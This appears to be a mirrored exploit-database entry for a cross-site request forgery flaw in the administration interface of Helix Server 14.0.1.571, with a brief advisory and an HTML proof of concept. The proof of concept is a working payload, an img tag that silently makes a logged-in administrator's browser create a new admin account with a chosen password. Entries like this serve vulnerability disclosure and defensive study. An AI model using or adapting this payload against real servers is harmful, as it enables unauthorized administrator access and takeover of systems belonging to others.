Helix Server 14.0.1.571 – Administration Interface Cross-Site Request Forgery

  • 作者: John Leitch
    日期: 2010-12-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35092/
  • source: https://www.securityfocus.com/bid/45340/info
    
    Helix Server is prone to a cross-site request-forgery vulnerability.
    
    An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site.
    
    Helix Server 14.0.1.571 is vulnerable; other versions may also be affected. 
    
    <html>
    <body>
    <img src="http://www.example.com/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
    </body>
    </html>